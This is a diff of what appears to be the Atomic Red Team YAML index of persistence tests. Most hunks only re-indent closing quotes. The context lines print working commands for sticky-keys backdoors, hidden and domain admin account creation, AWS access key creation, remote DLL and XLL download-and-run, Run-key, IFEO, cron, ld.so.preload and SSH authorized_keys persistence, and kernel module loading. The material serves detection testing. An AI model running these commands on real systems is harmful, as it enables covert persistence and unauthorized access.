           copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
         cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1098:
@@ -37371,7 +37371,7 @@ persistence:
       auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
       description: 'Manipulate Admin Account Name
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -37437,7 +37437,7 @@ persistence:
       dependencies:
       - description: 'PS Module ActiveDirectory
 
-          '
+'
         prereq_command: "Try {\n    Import-Module ActiveDirectory -ErrorAction Stop
           | Out-Null\n    exit 0\n} \nCatch {\n    exit 1\n}\n"
         get_prereq_command: |
@@ -37460,14 +37460,14 @@ persistence:
         cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
           | Remove-ADUser -Confirm:$False
 
-          '
+'
         name: powershell
     - name: AWS - Create a group and add a user to that group
       auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
       description: 'Adversaries create AWS group, add users to specific to that group
         to elevate their privilieges to gain more accesss
 
-        '
+'
       supported_platforms:
       - iaas:aws
       input_arguments:
@@ -37479,14 +37479,14 @@ persistence:
       - description: 'Check if the user exists, we can only add a user to a group
           if the user exists.
 
-          '
+'
         prereq_command: 'aws iam list-users | grep #{username}
 
-          '
+'
         get_prereq_command: 'echo Please run atomic test T1136.003, before running
           this atomic test
 
-          '
+'
       executor:
         command: |
           aws iam create-group --group-name #{username}
@@ -37700,7 +37700,7 @@ persistence:
         command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
           ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
 
-          '
+'
   T1098.001:
     technique:
       external_references:
@@ -37807,13 +37807,13 @@ persistence:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-          '
+'
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-          '
+'
       executor:
         command: |
           Import-Module -Name AzureAD
@@ -37884,13 +37884,13 @@ persistence:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-          '
+'
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-          '
+'
       executor:
         command: |
           Import-Module -Name AzureAD
@@ -37932,7 +37932,7 @@ persistence:
       description: 'Adversaries create their own new access and secret keys to programatically
         interact with AWS environment, which is already compromised
 
-        '
+'
       supported_platforms:
       - iaas:aws
       input_arguments:
@@ -37943,14 +37943,14 @@ persistence:
       dependencies:
       - description: 'Check if the user exists.
 
-          '
+'
         prereq_command: 'aws iam list-users | grep #{username}
 
-          '
+'
         get_prereq_command: 'echo Please run atomic test T1136.003, before running
           this atomic
 
-          '
+'
       executor:
         command: |
           aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
@@ -38145,11 +38145,11 @@ persistence:
       - description: 'Reg files must exist on disk at specified locations (#{registry_file}
           and #{registry_cleanup_file})
 
-          '
+'
         prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -38158,11 +38158,11 @@ persistence:
       - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
           T1546.010x86.dll)
 
-          '
+'
         prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -38170,10 +38170,10 @@ persistence:
       executor:
         command: 'reg.exe import #{registry_file}
 
-          '
+'
         cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1546.011:
@@ -38281,31 +38281,31 @@ persistence:
       - description: 'Shim database file must exist on disk at specified location
           (#{file_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
       - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
 
-          '
+'
         prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
       executor:
         command: 'sdbinst.exe #{file_path}
 
-          '
+'
         cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: New shim database files created in the default shim database directory
@@ -38398,7 +38398,7 @@ persistence:
       description: 'This test submits a command to be run in the future by the `at`
         daemon.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -38414,30 +38414,30 @@ persistence:
       dependencies:
       - description: 'The `at` and `atd` executables must exist in the PATH
 
-          '
+'
         prereq_command: 'which at && which atd
 
-          '
+'
         get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
           in the PATH (Package name: `at`)''
 
-          '
+'
       - description: 'The `atd` daemon must be running
 
-          '
+'
         prereq_command: 'systemctl status atd || service atd status
 
-          '
+'
         get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
           atd start` ; systemd: `systemctl start atd`)''
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}
 
-          '
+'
   T1053.002:
     technique:
       external_references:
@@ -38534,7 +38534,7 @@ persistence:
         elevation_required: false
         command: 'at 13:20 /interactive cmd
 
-          '
+'
   T1547.002:
     technique:
       id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec
@@ -38699,10 +38699,10 @@ persistence:
         command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
           #{local_file}
 
-          '
+'
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Bitsadmin Download (PowerShell)
       auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -38726,10 +38726,10 @@ persistence:
         command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
           #{local_file}
 
-          '
+'
         cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Persist, Download, & Execute
       auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -38767,7 +38767,7 @@ persistence:
           bitsadmin.exe /complete #{bits_job_name}
         cleanup_command: 'del #{local_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Bits download using desktopimgdownldr.exe (cmd)
       auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -38799,10 +38799,10 @@ persistence:
         command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
           /eventName:desktopimgdownldr
 
-          '
+'
         cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1
 
-          '
+'
         name: command_prompt
   T1547:
     technique:
@@ -39127,7 +39127,7 @@ persistence:
       auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
       description: 'Create a file called test.wma, with the duration of 30 seconds
 
-        '
+'
       supported_platforms:
       - linux
       - windows
@@ -39147,7 +39147,7 @@ persistence:
         sent from a compromised host. This will install one (of many) available VPNS
         in the Edge add-on store.
 
-        '
+'
       supported_platforms:
       - windows
       - macos
@@ -39267,7 +39267,7 @@ persistence:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -39312,7 +39312,7 @@ persistence:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -39350,7 +39350,7 @@ persistence:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -39467,10 +39467,10 @@ persistence:
       executor:
         command: 'assoc #{extension_to_change}=#{target_extension_handler}
 
-          '
+'
         cleanup_command: 'assoc  #{extension_to_change}=#{original_extension_handler}
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1136.003:
@@ -39540,7 +39540,7 @@ persistence:
         activity do not interupt the normal functions of the compromised users and
         can remain undetected for a long time
 
-        '
+'
       supported_platforms:
       - iaas:aws
       input_arguments:
@@ -39551,21 +39551,21 @@ persistence:
       dependencies:
       - description: 'Check if ~/.aws/credentials file has a default stanza is configured
 
-          '
+'
         prereq_command: 'cat ~/.aws/credentials | grep "default"
 
-          '
+'
         get_prereq_command: 'echo Please install the aws-cli and configure your AWS
           defult profile using: aws configure
 
-          '
+'
       executor:
         command: 'aws iam create-user --user-name #{username}
 
-          '
+'
         cleanup_command: 'aws iam delete-user --user-name #{username}
 
-          '
+'
         name: sh
         elevation_required: false
   T1078.004:
@@ -39861,7 +39861,7 @@ persistence:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -39872,17 +39872,17 @@ persistence:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl get cronjobs -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
     - name: CreateCronjob
@@ -39894,7 +39894,7 @@ persistence:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -39905,20 +39905,20 @@ persistence:
       dependencies:
       - description: 'kubectl must be installed
 
-          '
+'
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-          '
+'
         prereq_command: 'which kubectl
 
-          '
+'
       executor:
         command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
 
-          '
+'
         cleanup_command: 'kubectl delete cronjob art -n #{namespace}
 
-          '
+'
         name: bash
         elevation_required: false
   T1136:
@@ -40100,7 +40100,7 @@ persistence:
         of the referenced file. This technique was used by numerous IoT automated
         exploitation attacks.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -40120,7 +40120,7 @@ persistence:
           echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
         cleanup_command: 'crontab /tmp/notevil
 
-          '
+'
     - name: Cron - Add script to all cron subfolders
       auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
       description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -40128,7 +40128,7 @@ persistence:
         schedule. This technique was used by the threat actor Rocke during the exploitation
         of Linux web servers.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -40160,7 +40160,7 @@ persistence:
         to execute on a schedule. This technique was used by the threat actor Rocke
         during the exploitation of Linux web servers.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -40177,10 +40177,10 @@ persistence:
         name: bash
         command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
 
-          '
+'
         cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
 
-          '
+'
   T1574.001:
     technique:
       id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
@@ -40355,10 +40355,10 @@ persistence:
       dependencies:
       - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
 
-          '
+'
         prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -40366,7 +40366,7 @@ persistence:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
   T1078.001:
     technique:
@@ -40478,16 +40478,16 @@ persistence:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-          '
+'
         cleanup_command: 'net user guest /active:no
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1136.002:
@@ -40539,7 +40539,7 @@ persistence:
       auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
       description: 'Creates a new domain admin user in a command prompt.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -40561,14 +40561,14 @@ persistence:
           net group "#{group}" "#{username}" /add /domain
         cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
 
-          '
+'
         name: command_prompt
         elevation_required: false
     - name: Create a new account similar to ANONYMOUS LOGON
       auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
       description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -40583,10 +40583,10 @@ persistence:
       executor:
         command: 'net user "#{username}" "#{password}" /add /domain
 
-          '
+'
         cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
 
-          '
+'
         name: command_prompt
         elevation_required: false
     - name: Create a new Domain Account using PowerShell
@@ -40594,7 +40594,7 @@ persistence:
       description: 'Creates a new Domain User using the credentials of the Current
         User
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -40623,7 +40623,7 @@ persistence:
           $User
         cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"
 
-          '
+'
         name: powershell
         elevation_required: false
   T1078.002:
@@ -40986,21 +40986,21 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-          '
+'
         prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-          '
+'
       executor:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
-          '
+'
         cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Shared Library Injection via LD_PRELOAD
@@ -41025,18 +41025,18 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-          '
+'
         prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-          '
+'
       executor:
         command: 'LD_PRELOAD=#{path_to_shared_library} ls
 
-          '
+'
         name: bash
   T1546.014:
     technique:
@@ -41097,7 +41097,7 @@ persistence:
       description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
         daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -41386,7 +41386,7 @@ persistence:
       description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
         please see "T1133\src\list of vpn extension.txt" to view complete list
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -41399,12 +41399,12 @@ persistence:
           type: String
           default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
 
-            '
+'
       dependency_executor_name: powershell
       dependencies:
       - description: 'Chrome must be installed
 
-          '
+'
         prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
           -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
           {exit 0} else {exit 1}
@@ -41624,7 +41624,7 @@ persistence:
       auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
       description: 'Leverage Global Flags Settings
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -41640,19 +41640,19 @@ persistence:
         command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
-          '
+'
         cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
           NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
           /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: IFEO Global Flags
       auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
       description: 'Leverage Global Flags Settings
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -41836,7 +41836,7 @@ persistence:
       description: 'This test uses the insmod command to load a kernel module for
         Linux.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -41860,10 +41860,10 @@ persistence:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location
 
-          '
+'
         prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
 
-          '
+'
         get_prereq_command: |
           if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
           cp #{module_source_path}/* #{temp_folder}/
@@ -41872,7 +41872,7 @@ persistence:
       executor:
         command: 'sudo insmod #{module_path}
 
-          '
+'
         cleanup_command: |
           sudo rmmod #{module_name}
           [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -42078,7 +42078,7 @@ persistence:
       auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
       description: 'Create a plist and execute it
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -42095,15 +42095,15 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-          '
+'
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
           exit 1;
 
-          '
+'
       executor:
         name: bash
         elevation_required: true
@@ -42197,7 +42197,7 @@ persistence:
       auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
       description: 'Utilize LaunchDaemon to launch `Hello World`
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -42214,15 +42214,15 @@ persistence:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-          '
+'
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-          '
+'
         get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
           try again."; exit 1;
 
-          '
+'
       executor:
         name: bash
         elevation_required: true
@@ -42366,7 +42366,7 @@ persistence:
       auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
       description: 'Create a user via useradd
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -42377,17 +42377,17 @@ persistence:
       executor:
         command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
 
-          '
+'
         cleanup_command: 'userdel #{username}
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Create a user account on a MacOS system
       auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2'
       description: 'Creates a user on a MacOS system with dscl
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -42409,7 +42409,7 @@ persistence:
           dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
         cleanup_command: 'dscl . -delete /Users/#{username}
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Create a new user in a command prompt
@@ -42431,10 +42431,10 @@ persistence:
       executor:
         command: 'net user /add "#{username}" "#{password}"
 
-          '
+'
         cleanup_command: 'net user /del "#{username}" >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Create a new user in PowerShell
@@ -42452,10 +42452,10 @@ persistence:
       executor:
         command: 'New-LocalUser -Name "#{username}" -NoPassword
 
-          '
+'
         cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Create a new user in Linux with `root` UID and GID.
@@ -42463,7 +42463,7 @@ persistence:
       description: 'Creates a new user in Linux and adds the user to the `root` group.
         This technique was used by adversaries during the Butter attack campaign.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -42481,14 +42481,14 @@ persistence:
           if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
         cleanup_command: 'userdel #{username}
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Create a new Windows admin user
       auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
       description: 'Creates a new admin user in a command prompt.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -42506,7 +42506,7 @@ persistence:
           net localgroup administrators "#{username}" /add
         cleanup_command: 'net user /del "#{username}" >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1078.003:
@@ -42634,7 +42634,7 @@ persistence:
       auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
       description: 'Mac logon script
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -42863,7 +42863,7 @@ persistence:
       description: 'Netsh interacts with other operating system components using dynamic-link
         library (DLL) files
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -42874,7 +42874,7 @@ persistence:
       executor:
         command: 'netsh.exe add helper #{helper_file}
 
-          '
+'
         name: command_prompt
   T1556.004:
     technique:
@@ -43243,11 +43243,11 @@ persistence:
         command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
           /t REG_SZ /d "#{thing_to_execute}"
 
-          '
+'
         cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office
           test\Special\Perf"
 
-          '
+'
         name: command_prompt
   T1137.003:
     technique:
@@ -43382,11 +43382,11 @@ persistence:
         command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
           /v URL /t REG_SZ /d #{url} /f
 
-          '
+'
         cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
           /v URL /f
 
-          '
+'
   T1137.005:
     technique:
       external_references:
@@ -43507,7 +43507,7 @@ persistence:
       description: 'Uses PowerShell to install and register a password filter DLL.
         Requires a reboot and administrative privileges.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -43520,14 +43520,14 @@ persistence:
       - description: 'AtomicPasswordFilter.dll must exist on disk at specified location
           (#{input_dll})
 
-          '
+'
         prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host "You must provide your own password filter
           dll"
 
-          '
+'
       executor:
         command: |
           $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -43943,7 +43943,7 @@ persistence:
       auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
       description: 'Modify MacOS plist file in one of two directories
 
-        '
+'
       supported_platforms:
       - macos
       executor:
@@ -44155,10 +44155,10 @@ persistence:
         command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
           /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
 
-          '
+'
         cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1546.013:
@@ -44244,7 +44244,7 @@ persistence:
         profile pofile that points to a malicious executable. Upon execution, calc.exe
         will be launched.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -44260,13 +44260,13 @@ persistence:
       dependencies:
       - description: 'Ensure a powershell profile exists for the current user
 
-          '
+'
         prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
 
-          '
+'
       executor:
         command: |
           Add-Content #{ps_profile} -Value ""
@@ -44484,14 +44484,14 @@ persistence:
         command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
           World"'' >> /etc/rc.common
 
-          '
+'
         elevation_required: true
         name: bash
     - name: rc.common
       auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
       description: 'Modify rc.common
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -44507,12 +44507,12 @@ persistence:
           ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
           && sudo rm $origfilename;fi
 
-          '
+'
     - name: rc.local
       auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
       description: 'Modify rc.local
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -44528,7 +44528,7 @@ persistence:
           ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
           sudo rm $origfilename;fi
 
-          '
+'
   T1542.004:
     technique:
       created: '2020-10-20T00:05:48.790Z'
@@ -44654,10 +44654,10 @@ persistence:
       executor:
         command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
 
-          '
+'
         cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
 
-          '
+'
         elevation_required: true
         name: sh
   T1108:
@@ -44852,11 +44852,11 @@ persistence:
         command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
           "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
 
-          '
+'
         cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
           /V "Atomic Red Team" /f >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Reg Key RunOnce
       auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -44874,11 +44874,11 @@ persistence:
         command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /d "#{thing_to_execute}"
 
-          '
+'
         cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /f >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: PowerShell Registry RunOnce
@@ -44904,7 +44904,7 @@ persistence:
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Suspicious vbs file run from startup Folder
@@ -45125,10 +45125,10 @@ persistence:
           ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys;
           fi;
 
-          '
+'
         cleanup_command: 'unset ssh_authorized_keys
 
-          '
+'
   T1053.005:
     technique:
       created: '2019-11-27T14:58:00.429Z'
@@ -45226,7 +45226,7 @@ persistence:
       description: 'Upon successful execution, cmd.exe will create a scheduled task
         to spawn cmd.exe at 20:10.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -45243,10 +45243,10 @@ persistence:
         elevation_required: false
         command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
 
-          '
+'
         cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
 
-          '
+'
     - name: Scheduled task Remote
       auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
       description: |
@@ -45282,11 +45282,11 @@ persistence:
         command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
           "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
-          '
+'
         cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
           /TN "Atomic task" /F >nul 2>&1
 
-          '
+'
     - name: Powershell Cmdlet Scheduled Task
       auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
       description: |
@@ -45308,7 +45308,7 @@ persistence:
